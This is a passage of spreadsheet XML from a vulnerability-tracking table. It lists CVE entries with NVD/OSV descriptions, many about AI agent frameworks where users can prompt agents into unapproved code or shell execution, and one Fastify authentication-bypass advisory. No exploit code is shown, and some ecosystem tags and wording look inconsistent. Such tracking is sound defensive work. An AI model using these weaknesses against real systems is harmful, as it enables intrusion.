      <c r="D611" s="5" t="inlineStr"/>
      <c r="E611" s="5" t="inlineStr"/>
      <c r="F611" s="5" t="inlineStr"/>
      <c r="G611" s="5" t="inlineStr"/>
      <c r="H611" s="5" t="inlineStr"/>
      <c r="I611" s="5" t="inlineStr"/>
      <c r="J611" s="5" t="inlineStr"/>
      <c r="K611" s="5" t="inlineStr"/>
      <c r="L611" s="5" t="inlineStr"/>
      <c r="M611" s="5" t="inlineStr"/>
      <c r="N611" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O611" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P611" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q611" s="5" t="inlineStr"/>
      <c r="R611" s="5" t="inlineStr"/>
      <c r="S611" s="5" t="inlineStr">
        <is>
          <t>An attacker could cause a heap buffer overflow by getting a user to open an email that is greater than or equal to 2GB in size. This vulnerability was fixed in Thunderbird 157, Thunderbird 140.17, and Thunderbird 153.4.</t>
        </is>
      </c>
      <c r="T611" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103500</t>
        </is>
      </c>
    </row>
    <row r="612">
      <c r="A612" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B612" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C612" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19253</t>
        </is>
      </c>
      <c r="D612" s="5" t="inlineStr"/>
      <c r="E612" s="5" t="inlineStr"/>
      <c r="F612" s="5" t="inlineStr"/>
      <c r="G612" s="5" t="inlineStr"/>
      <c r="H612" s="5" t="inlineStr"/>
      <c r="I612" s="5" t="inlineStr"/>
      <c r="J612" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K612" s="5" t="inlineStr"/>
      <c r="L612" s="5" t="inlineStr"/>
      <c r="M612" s="5" t="inlineStr"/>
      <c r="N612" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O612" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="P612" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q612" s="5" t="inlineStr"/>
      <c r="R612" s="5" t="inlineStr"/>
      <c r="S612" s="5" t="inlineStr">
        <is>
          <t>The Cache Enabler WordPress plugin before 1.8.17 does not validate a URL before using it to build a filesystem path in its cache purge routine, and does not confine the resulting deletion to the cache directory, allowing unauthenticated users to delete arbitrary files and directories on sites where another installed Cache Enabler WordPress plugin before 1.8.17 or  passes a request-derived URL to its public cache-clearing hook.</t>
        </is>
      </c>
      <c r="T612" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19253</t>
        </is>
      </c>
    </row>
    <row r="613">
      <c r="A613" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B613" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C613" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-51852</t>
        </is>
      </c>
      <c r="D613" s="5" t="inlineStr"/>
      <c r="E613" s="5" t="inlineStr"/>
      <c r="F613" s="5" t="inlineStr"/>
      <c r="G613" s="5" t="inlineStr"/>
      <c r="H613" s="5" t="inlineStr"/>
      <c r="I613" s="5" t="inlineStr"/>
      <c r="J613" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="K613" s="5" t="inlineStr"/>
      <c r="L613" s="5" t="inlineStr"/>
      <c r="M613" s="5" t="inlineStr"/>
      <c r="N613" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O613" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P613" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q613" s="5" t="inlineStr"/>
      <c r="R613" s="5" t="inlineStr"/>
      <c r="S613" s="5" t="inlineStr">
        <is>
          <t>agent-zero 1.7, 1.8, 1.9, and 1.10 is vulnerable to Directory Traversal in python/helpers/file_browser.py:FileBrowser.save_file_b64. The save_file_b64 method accepts user-controlled file paths without normalization or validation, allowing path traversal attacks.</t>
        </is>
      </c>
      <c r="T613" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-51852</t>
        </is>
      </c>
    </row>
    <row r="614">
      <c r="A614" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B614" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C614" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-51853</t>
        </is>
      </c>
      <c r="D614" s="5" t="inlineStr"/>
      <c r="E614" s="5" t="inlineStr"/>
      <c r="F614" s="5" t="inlineStr"/>
      <c r="G614" s="5" t="inlineStr"/>
      <c r="H614" s="5" t="inlineStr"/>
      <c r="I614" s="5" t="inlineStr"/>
      <c r="J614" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="K614" s="5" t="inlineStr"/>
      <c r="L614" s="5" t="inlineStr"/>
      <c r="M614" s="5" t="inlineStr"/>
      <c r="N614" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O614" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P614" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q614" s="5" t="inlineStr"/>
      <c r="R614" s="5" t="inlineStr"/>
      <c r="S614" s="5" t="inlineStr">
        <is>
          <t>agent-zero 1.7, 1.8, 1.9, and 1.10 is vulnerable to Directory Traversal in python/helpers/file_browser.py:FileBrowser.__init__. The FileBrowser class initializes with the host root directory as the workspace, allowing the agent to access any file on the system without restriction.</t>
        </is>
      </c>
      <c r="T614" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-51853</t>
        </is>
      </c>
    </row>
    <row r="615">
      <c r="A615" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B615" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C615" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-51856</t>
        </is>
      </c>
      <c r="D615" s="5" t="inlineStr"/>
      <c r="E615" s="5" t="inlineStr"/>
      <c r="F615" s="5" t="inlineStr"/>
      <c r="G615" s="5" t="inlineStr"/>
      <c r="H615" s="5" t="inlineStr"/>
      <c r="I615" s="5" t="inlineStr"/>
      <c r="J615" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="K615" s="5" t="inlineStr"/>
      <c r="L615" s="5" t="inlineStr"/>
      <c r="M615" s="5" t="inlineStr"/>
      <c r="N615" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O615" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P615" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q615" s="5" t="inlineStr"/>
      <c r="R615" s="5" t="inlineStr"/>
      <c r="S615" s="5" t="inlineStr">
        <is>
          <t>In agentscope 1.0.18, 1.0.19, and 1.0.19 when the RealtimeAgent session exposes execute_python_code as an available tool, a remote WebSocket user can prompt the agent to call that tool and run Python code in the service environment. In the validated path, RealtimeAgent._acting forwards the model-produced tool call to Toolkit.call_tool_function, which invokes execute_python_code without an additional approval or isolation boundary on that path.</t>
        </is>
      </c>
      <c r="T615" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-51856</t>
        </is>
      </c>
    </row>
    <row r="616">
      <c r="A616" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B616" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C616" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-51857</t>
        </is>
      </c>
      <c r="D616" s="5" t="inlineStr"/>
      <c r="E616" s="5" t="inlineStr"/>
      <c r="F616" s="5" t="inlineStr"/>
      <c r="G616" s="5" t="inlineStr"/>
      <c r="H616" s="5" t="inlineStr"/>
      <c r="I616" s="5" t="inlineStr"/>
      <c r="J616" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="K616" s="5" t="inlineStr"/>
      <c r="L616" s="5" t="inlineStr"/>
      <c r="M616" s="5" t="inlineStr"/>
      <c r="N616" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O616" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P616" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q616" s="5" t="inlineStr"/>
      <c r="R616" s="5" t="inlineStr"/>
      <c r="S616" s="5" t="inlineStr">
        <is>
          <t>In camel-ai camel 0.2.91a1, v0.2.91a2 and v0.2.91a3, CodeExecutionToolkit can run model-produced Python code through SubprocessInterpreter without an approval boundary.</t>
        </is>
      </c>
      <c r="T616" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-51857</t>
        </is>
      </c>
    </row>
    <row r="617">
      <c r="A617" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B617" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C617" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-51858</t>
        </is>
      </c>
      <c r="D617" s="5" t="inlineStr"/>
      <c r="E617" s="5" t="inlineStr"/>
      <c r="F617" s="5" t="inlineStr"/>
      <c r="G617" s="5" t="inlineStr"/>
      <c r="H617" s="5" t="inlineStr"/>
      <c r="I617" s="5" t="inlineStr"/>
      <c r="J617" s="5" t="inlineStr"/>
      <c r="K617" s="5" t="inlineStr"/>
      <c r="L617" s="5" t="inlineStr"/>
      <c r="M617" s="5" t="inlineStr"/>
      <c r="N617" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O617" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P617" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q617" s="5" t="inlineStr"/>
      <c r="R617" s="5" t="inlineStr"/>
      <c r="S617" s="5" t="inlineStr">
        <is>
          <t>In camel-ai camel 0.2.91a1, v0.2.91a2 and v0.2.91a3, TerminalToolkit.shell_exec allows prompt-driven shell command execution without an approval boundary.</t>
        </is>
      </c>
      <c r="T617" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-51858</t>
        </is>
      </c>
    </row>
    <row r="618">
      <c r="A618" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B618" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C618" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-51859</t>
        </is>
      </c>
      <c r="D618" s="5" t="inlineStr"/>
      <c r="E618" s="5" t="inlineStr"/>
      <c r="F618" s="5" t="inlineStr"/>
      <c r="G618" s="5" t="inlineStr"/>
      <c r="H618" s="5" t="inlineStr"/>
      <c r="I618" s="5" t="inlineStr"/>
      <c r="J618" s="5" t="inlineStr"/>
      <c r="K618" s="5" t="inlineStr"/>
      <c r="L618" s="5" t="inlineStr"/>
      <c r="M618" s="5" t="inlineStr"/>
      <c r="N618" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O618" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P618" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q618" s="5" t="inlineStr"/>
      <c r="R618" s="5" t="inlineStr"/>
      <c r="S618" s="5" t="inlineStr">
        <is>
          <t>bisheng 2.3.0, 2.4.0, and 2.4.0-beta1 is vulnerable to directory traversal in save_download_file (src/backend/bisheng/core/cache/utils.py:290).</t>
        </is>
      </c>
      <c r="T618" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-51859</t>
        </is>
      </c>
    </row>
    <row r="619">
      <c r="A619" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B619" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C619" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-51860</t>
        </is>
      </c>
      <c r="D619" s="5" t="inlineStr"/>
      <c r="E619" s="5" t="inlineStr"/>
      <c r="F619" s="5" t="inlineStr"/>
      <c r="G619" s="5" t="inlineStr"/>
      <c r="H619" s="5" t="inlineStr"/>
      <c r="I619" s="5" t="inlineStr"/>
      <c r="J619" s="5" t="inlineStr"/>
      <c r="K619" s="5" t="inlineStr"/>
      <c r="L619" s="5" t="inlineStr"/>
      <c r="M619" s="5" t="inlineStr"/>
      <c r="N619" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O619" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P619" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q619" s="5" t="inlineStr"/>
      <c r="R619" s="5" t="inlineStr"/>
      <c r="S619" s="5" t="inlineStr">
        <is>
          <t>bisheng 2.3.0, 2.4.0, and 2.4.0-beta1 is vulnerable to Directory Traversal in src/backend/bisheng/linsight/domain/task_exec.py.</t>
        </is>
      </c>
      <c r="T619" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-51860</t>
        </is>
      </c>
    </row>
    <row r="620">
      <c r="A620" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B620" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C620" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-51861</t>
        </is>
      </c>
      <c r="D620" s="5" t="inlineStr"/>
      <c r="E620" s="5" t="inlineStr"/>
      <c r="F620" s="5" t="inlineStr"/>
      <c r="G620" s="5" t="inlineStr"/>
      <c r="H620" s="5" t="inlineStr"/>
      <c r="I620" s="5" t="inlineStr"/>
      <c r="J620" s="5" t="inlineStr"/>
      <c r="K620" s="5" t="inlineStr"/>
      <c r="L620" s="5" t="inlineStr"/>
      <c r="M620" s="5" t="inlineStr"/>
      <c r="N620" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O620" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P620" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q620" s="5" t="inlineStr"/>
      <c r="R620" s="5" t="inlineStr"/>
      <c r="S620" s="5" t="inlineStr">
        <is>
          <t>bisheng 2.3.0, 2.4.0, and 2.4.0-beta1 is vulnerable to Code Injection in src/backend/bisheng/api/v1/validate.py.</t>
        </is>
      </c>
      <c r="T620" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-51861</t>
        </is>
      </c>
    </row>
    <row r="621">
      <c r="A621" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B621" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C621" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-51862</t>
        </is>
      </c>
      <c r="D621" s="5" t="inlineStr"/>
      <c r="E621" s="5" t="inlineStr"/>
      <c r="F621" s="5" t="inlineStr"/>
      <c r="G621" s="5" t="inlineStr"/>
      <c r="H621" s="5" t="inlineStr"/>
      <c r="I621" s="5" t="inlineStr"/>
      <c r="J621" s="5" t="inlineStr"/>
      <c r="K621" s="5" t="inlineStr"/>
      <c r="L621" s="5" t="inlineStr"/>
      <c r="M621" s="5" t="inlineStr"/>
      <c r="N621" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O621" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P621" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q621" s="5" t="inlineStr"/>
      <c r="R621" s="5" t="inlineStr"/>
      <c r="S621" s="5" t="inlineStr">
        <is>
          <t>DB-GPT 0.8.0 contains directory traversal in skill_upload (packages/dbgpt-app/src/dbgpt_app/openapi/api_v1/agentic_data_api.py:40). A remote attacker can use the validated exploitation path to write files outside the intended workspace or storage boundary.</t>
        </is>
      </c>
      <c r="T621" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-51862</t>
        </is>
      </c>
    </row>
    <row r="622">
      <c r="A622" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B622" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C622" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-51864</t>
        </is>
      </c>
      <c r="D622" s="5" t="inlineStr"/>
      <c r="E622" s="5" t="inlineStr"/>
      <c r="F622" s="5" t="inlineStr"/>
      <c r="G622" s="5" t="inlineStr"/>
      <c r="H622" s="5" t="inlineStr"/>
      <c r="I622" s="5" t="inlineStr"/>
      <c r="J622" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="K622" s="5" t="inlineStr"/>
      <c r="L622" s="5" t="inlineStr"/>
      <c r="M622" s="5" t="inlineStr"/>
      <c r="N622" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O622" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P622" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q622" s="5" t="inlineStr"/>
      <c r="R622" s="5" t="inlineStr"/>
      <c r="S622" s="5" t="inlineStr">
        <is>
          <t>DB-GPT v0.7.5 and v0.8.0 contains directory traversal in python_file_upload (packages/dbgpt-app/src/dbgpt_app/openapi/api_v1/python_upload_api.py:42). A remote attacker can use the validated exploitation path to write files outside the intended workspace or storage boundary.</t>
        </is>
      </c>
      <c r="T622" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-51864</t>
        </is>
      </c>
    </row>
    <row r="623">
      <c r="A623" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B623" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C623" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-51866</t>
        </is>
      </c>
      <c r="D623" s="5" t="inlineStr"/>
      <c r="E623" s="5" t="inlineStr"/>
      <c r="F623" s="5" t="inlineStr"/>
      <c r="G623" s="5" t="inlineStr"/>
      <c r="H623" s="5" t="inlineStr"/>
      <c r="I623" s="5" t="inlineStr"/>
      <c r="J623" s="5" t="inlineStr">
        <is>
          <t>react</t>
        </is>
      </c>
      <c r="K623" s="5" t="inlineStr"/>
      <c r="L623" s="5" t="inlineStr"/>
      <c r="M623" s="5" t="inlineStr"/>
      <c r="N623" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O623" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P623" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q623" s="5" t="inlineStr"/>
      <c r="R623" s="5" t="inlineStr"/>
      <c r="S623" s="5" t="inlineStr">
        <is>
          <t>In DB-GPT 0.7.5 and 0.8.0, a skill uploaded through the real /api/v1/skills/upload route can later be executed through the real /api/v1/chat/react-agent flow.</t>
        </is>
      </c>
      <c r="T623" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-51866</t>
        </is>
      </c>
    </row>
    <row r="624">
      <c r="A624" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B624" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C624" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-51867</t>
        </is>
      </c>
      <c r="D624" s="5" t="inlineStr"/>
      <c r="E624" s="5" t="inlineStr"/>
      <c r="F624" s="5" t="inlineStr"/>
      <c r="G624" s="5" t="inlineStr"/>
      <c r="H624" s="5" t="inlineStr"/>
      <c r="I624" s="5" t="inlineStr"/>
      <c r="J624" s="5" t="inlineStr"/>
      <c r="K624" s="5" t="inlineStr"/>
      <c r="L624" s="5" t="inlineStr"/>
      <c r="M624" s="5" t="inlineStr"/>
      <c r="N624" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O624" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P624" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q624" s="5" t="inlineStr"/>
      <c r="R624" s="5" t="inlineStr"/>
      <c r="S624" s="5" t="inlineStr">
        <is>
          <t>agentgpt v.1.0.0 is vulnerable to Incorrect Access Control in next/src/server/api/routers/agentRouter.ts. An externally reachable path accepts a caller-selected object or tenant identifier and reaches a data-access operation without a visible owner, tenant, workspace, or membership binding on that object.</t>
        </is>
      </c>
      <c r="T624" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-51867</t>
        </is>
      </c>
    </row>
    <row r="625">
      <c r="A625" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B625" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C625" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-51869</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2026-09-30</t>
        </is>
      </c>
      <c r="P625" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q625" s="5" t="inlineStr"/>
      <c r="R625" s="5" t="inlineStr"/>
      <c r="S625" s="5" t="inlineStr">
        <is>
          <t>DB-GPT v0.8.0 sandbox API silently falls back to LocalRuntime and executes code on host.</t>
        </is>
      </c>
      <c r="T625" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-51869</t>
        </is>
      </c>
    </row>
    <row r="626">
      <c r="A626" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B626" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C626" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-51870</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2026-09-30</t>
        </is>
      </c>
      <c r="P626" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q626" s="5" t="inlineStr"/>
      <c r="R626" s="5" t="inlineStr"/>
      <c r="S626" s="5" t="inlineStr">
        <is>
          <t>DeepTutor v1.4.0 is vulnerable to command execution in /tutorbot/agent/tools/shell.py:ExecTool.execute.</t>
        </is>
      </c>
      <c r="T626" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-51870</t>
        </is>
      </c>
    </row>
    <row r="627">
      <c r="A627" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B627" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C627" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-51871</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2026-09-30</t>
        </is>
      </c>
      <c r="P627" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q627" s="5" t="inlineStr"/>
      <c r="R627" s="5" t="inlineStr"/>
      <c r="S627" s="5" t="inlineStr">
        <is>
          <t>Devika v1.0 is vulnerable to Code Injection in the Runner.execute function in src/agents/runner/runner.py which allows an attacker to achieve arbitrary code execution by exploiting the direct execution of LLM-generated content.</t>
        </is>
      </c>
      <c r="T627" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-51871</t>
        </is>
      </c>
    </row>
    <row r="628">
      <c r="A628" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B628" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C628" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-51872</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2026-09-30</t>
        </is>
      </c>
      <c r="P628" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q628" s="5" t="inlineStr"/>
      <c r="R628" s="5" t="inlineStr"/>
      <c r="S628" s="5" t="inlineStr">
        <is>
          <t>Devika v1.0 is vulnerable to Code Injection via the Runner.run_code function in src/agents/runner/runner.py.</t>
        </is>
      </c>
      <c r="T628" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-51872</t>
        </is>
      </c>
    </row>
    <row r="629">
      <c r="A629" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B629" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C629" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76169</t>
        </is>
      </c>
      <c r="D629" s="5" t="inlineStr"/>
      <c r="E629" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F629" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G629" s="5" t="inlineStr"/>
      <c r="H629" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I629" s="5" t="inlineStr"/>
      <c r="J629" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K629" s="5" t="inlineStr"/>
      <c r="L629" s="5" t="inlineStr">
        <is>
          <t>npm:fastify</t>
        </is>
      </c>
      <c r="M629" s="5" t="inlineStr">
        <is>
          <t>5.12.2</t>
        </is>
      </c>
      <c r="N629" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O629" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P629" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q629" s="5" t="inlineStr"/>
      <c r="R629" s="5" t="inlineStr"/>
      <c r="S629" s="5" t="inlineStr">
        <is>
          <t>### Impact
Fastify routes a malformed URL under one plugin prefix to the custom not-found handler of a different sibling plugin, invoking the handler registered last and skipping the `preHandler` declared in its `setNotFoundHandler()`. When the request method has no route in the main router, a malformed request target reaches Fastify's internal not-found router before URL decoding and is dispatched through a single shared handler pointer, regardless of prefix and without the normal request lifecycle. An unauthenticated request to a public prefix can therefore reach an authentication-protected not-found handler registered under a different prefix and receive its full response, breaking prefix encapsulation and bypassing the authentication hook. Applications whose private or tenant fallbacks return protected data from a not-found handler are affected.
### Patches
Patched in fastify 5.12.2. Malformed URLs are now routed through the configured `onBadUrl` and `onMaxParamLength` handlers so they fail closed before any application not-found handler runs, and the shared not-found handler pointer has been removed.
### Workarounds
Reject malformed request targets before they reach the application, for example at an upstream proxy or gateway, and do not rely on a not-found handler to serve protected data. A global `onRequest` authentication hook does not mitigate this, because the malformed-URL path skips it.</t>
        </is>
      </c>
      <c r="T629" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76169</t>
        </is>
      </c>
    </row>
    <row r="630">
      <c r="A630" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B630" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C630" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80490</t>
        </is>
      </c>
      <c r="D630" s="5" t="inlineStr"/>
      <c r="E630" s="5" t="inlineStr"/>
      <c r="F630" s="5" t="inlineStr"/>
      <c r="G630" s="5" t="inlineStr"/>
      <c r="H630" s="5" t="inlineStr"/>
      <c r="I630" s="5" t="inlineStr"/>
      <c r="J630" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K630" s="5" t="inlineStr"/>
      <c r="L630" s="5" t="inlineStr"/>
      <c r="M630" s="5" t="inlineStr"/>
      <c r="N630" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O630" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P630" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q630" s="5" t="inlineStr"/>
      <c r="R630" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S630" s="5" t="inlineStr">
        <is>
          <t>Algorithm::AhoCorasick::XS versions through 0.04 for Perl read the haystack string length before the scalar is stringified.
